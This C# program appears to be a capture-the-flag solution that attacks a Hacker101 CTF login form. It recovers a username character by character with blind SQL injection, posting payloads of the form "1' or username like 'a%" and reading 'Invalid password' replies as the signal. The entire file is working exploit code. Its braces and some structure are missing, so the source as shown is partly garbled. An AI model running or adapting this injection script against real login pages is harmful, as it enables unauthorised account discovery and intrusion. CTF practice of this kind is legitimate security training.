using System.Threading.Tasks;
public static void Main(string[] args)
const string LoginUrl = "https://f4b59c2cec5a21957a948ef2b7b4f779.ctf.hacker101.com/login";
const string BruteForceField = "username";
const int MaxFieldLength = 10;
var httpClient = new HttpClient();
var bruteforceStartString = string.Empty;
for (var i = 1; i <= MaxFieldLength; i++)
var result = await BruteforceField(bruteforceStartString, BruteForceField);
if (string.IsNullOrEmpty(result))
Console.WriteLine($"{BruteForceField} was found");
bruteforceStartString = result;
Console.WriteLine($"{BruteForceField} starts with: {bruteforceStartString}");
async Task<string> BruteforceField(string startString, string field)
var endString = $"{startString}z";
startString = $"{startString}a";
for (; startString != endString; startString = IncrementString(startString))
var response = await SendAuthRequest($"1' or {field} like '{startString}%");
if (response.Contains("Invalid password"))
string IncrementString(string value, int? position = null)
position ??= value.Length - 1;
if (value[position.Value] == 'z')
value = $"{value[..position.Value]}a{value[(position.Value+1)..]}";
return IncrementString(value, position - 1);
var incrementedChar = (char)(value[position.Value] + 1);
return $"{value[..position.Value]}{incrementedChar}{value[(position.Value+1)..]}";
async Task<string> SendAuthRequest(string username)
var credentials = new Dictionary<string, string>
{ "username", username },
{ "password", string.Empty }
var response = await httpClient.PostAsync(LoginUrl, new FormUrlEncodedContent(credentials));
return await response.Content.ReadAsStringAsync();